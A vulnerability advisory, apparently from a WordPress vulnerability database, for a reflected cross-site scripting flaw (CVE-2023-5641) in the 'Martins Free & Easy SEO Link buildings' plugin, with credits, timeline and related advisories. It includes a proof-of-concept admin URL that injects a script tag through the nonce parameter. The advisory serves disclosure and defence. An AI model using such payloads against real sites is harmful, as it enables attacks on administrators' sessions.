Martins Free & Easy SEO Link buildings < 1.2.30 – Reflected XSS | CVE 2023-5641 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in amin open
https://example.com/wp-admin/plugins.php?action=deactivate&plugin=martins-link-network%2FmartinsLinkNetwork.php&plugin_status=all&paged=1&s&_wpnonce=%27%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3Ca%20href=%27

Affects Plugins

martins-link-network

Fixed in 1.2.30

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Claudio Marchesini, Enrico Marcolini

Submitter

Claudio Marchesini, Enrico Marcolini

Submitter website

https://www.dottormarc.it

Submitter twitter

Verified

Yes

WPVDB ID

c0a6c253-71f2-415d-a6ec-022f2eafc13b

Timeline

Publicly Published

2023-11-06 (about 6 months ago)

Added

2023-11-06 (about 6 months ago)

Last Updated

2023-11-06 (about 6 months ago)

Other

Published

Title

Published

2023-05-10

Title

Booking Ultra Pro < 1.1.9 - Reflected XSS

Published

2022-08-01

Title

WP phpMyAdmin < 5.2.0.4 - Admin+ Stored Cross-Site Scripting

Published

2021-03-30

Title

Woocommerce Customers Manager < 26.6 - Authenticated Reflected Cross-Site Scripting (XSS)

Published

2021-09-06

Title

ELEX WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting (XSS)

Published

2023-07-19

Title

Art Decoration Shortcode <= 1.5.6 - Contributor+ Stored XSS